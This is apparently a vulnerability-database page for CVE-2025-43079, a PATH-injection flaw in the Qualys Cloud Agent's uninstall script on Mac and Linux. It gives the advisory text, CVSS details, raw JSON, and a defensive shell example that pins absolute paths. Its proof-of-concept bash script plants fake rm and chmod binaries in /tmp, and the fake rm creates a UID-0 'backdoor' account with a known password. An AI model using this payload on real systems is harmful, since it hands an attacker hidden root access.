Security Vulnerability Report
CVE-2025-43079 CVSS 6.3 MEDIUM

CVE-2025-43079

Published: 2025-11-10 18:16:06
Last Modified: 2026-04-15 00:35:42

Description

The Qualys Cloud Agent included a bundled uninstall script (qagent_uninstall.sh), specific to Mac and Linux supported versions that invoked multiple system commands without using absolute paths and without sanitizing the $PATH environment. If the uninstall script is executed with elevated privileges (e.g., via sudo) in an environment where $PATH has been manipulated, an attacker with root/sudo privileges could cause malicious executables to be run in place of the intended system binaries. This behavior can be leveraged for local privilege escalation and arbitrary command execution under elevated privileges.
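A hardening pattern for a root-run maintenance script of the kind described above, as an added example that is not Qualys code or the vendor's fix. The `TRUSTED_PATH` directory list and the function names are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not Qualys code: hardening pattern for a maintenance
# script that is expected to run under sudo.

# Assumption: system binaries live only in these root-owned directories.
TRUSTED_PATH="/usr/sbin:/usr/bin:/sbin:/bin"

# Resolve a bare command name to an absolute path using TRUSTED_PATH only.
# The inherited $PATH is never consulted.
resolve_trusted() {
    name=$1
    case $name in
        ''|*/*) return 1 ;;   # reject empty names and anything carrying a path
    esac
    saved_ifs=$IFS
    IFS=:
    for dir in $TRUSTED_PATH; do
        if [ -f "$dir/$name" ] && [ -x "$dir/$name" ]; then
            IFS=$saved_ifs
            printf '%s\n' "$dir/$name"
            return 0
        fi
    done
    IFS=$saved_ifs
    return 1
}

# Call once at the top of the script: discard the caller's PATH and pin the
# tools the script needs. Returns non-zero if a tool is missing.
harden_environment() {
    PATH=$TRUSTED_PATH
    export PATH
    unset ENV BASH_ENV CDPATH
    RM=$(resolve_trusted rm) || return 1
    CHMOD=$(resolve_trusted chmod) || return 1
}

# Constructed demonstration: the caller passes a directory holding a harmless
# decoy named "rm". Prints what a bare-name lookup picks, then the pinned path.
demo_lookup() {
    decoy_dir=$1
    PATH="$decoy_dir:$PATH"
    printf 'bare name: %s\n' "$(command -v rm)"
    harden_environment || return 1
    printf 'pinned:    %s\n' "$RM"
}
```

After `harden_environment`, the script calls `"$RM"` and `"$CHMOD"` instead of the bare names, so a directory prepended to the caller's `$PATH` is never searched.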

CVSS Details

CVSS Score: 6.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Qualys Cloud Agent (Mac): all versions
Qualys Cloud Agent (Linux): all versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2025-43079 PoC - PATH Injection in Qualys Cloud Agent uninstall script

# Attacker preparation (must have sudo access)
# Create malicious executables to replace system commands
cat > /tmp/rm << 'EOF'
#!/bin/bash
echo "Malicious rm executed! Creating backdoor..."
# Add root user or execute other malicious commands
useradd -ou 0 -g 0 backdoor 2>/dev/null || true
echo "backdoor:password" | chpasswd 2>/dev/null || true
exit 0
EOF

cat > /tmp/chmod << 'EOF'
#!/bin/bash
echo "Malicious chmod executed!"
# Could escalate privileges further
exit 0
EOF

# Make malicious executables executable
chmod +x /tmp/rm /tmp/chmod

# Set PATH to prioritize /tmp (attacker controlled directory)
export PATH=/tmp:/usr/local/bin:/usr/bin:/bin

# When admin runs: sudo ./qagent_uninstall.sh
# The script will execute our malicious binaries instead of system ones
echo "PoC ready. Wait for admin to run: sudo ./qagent_uninstall.sh"

References

https://www.qualys.com/security-advisories/cve-2025-43079

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43079", "sourceIdentifier": "[email protected]", "published": "2025-11-10T18:16:06.420", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Qualys Cloud Agent included a bundled uninstall script (qagent_uninstall.sh), specific to Mac and Linux supported versions that invoked multiple system commands without using absolute paths and without sanitizing the $PATH environment. If the uninstall script is executed with elevated privileges (e.g., via sudo) in an environment where $PATH has been manipulated, an attacker with root/sudo privileges could cause malicious executables to be run in place of the intended system binaries. This behavior can be leveraged for local privilege escalation and arbitrary command execution under elevated privileges."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.3, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-426"}]}], "references": [{"url": "https://www.qualys.com/security-advisories/cve-2025-43079", "source": "[email protected]"}]}}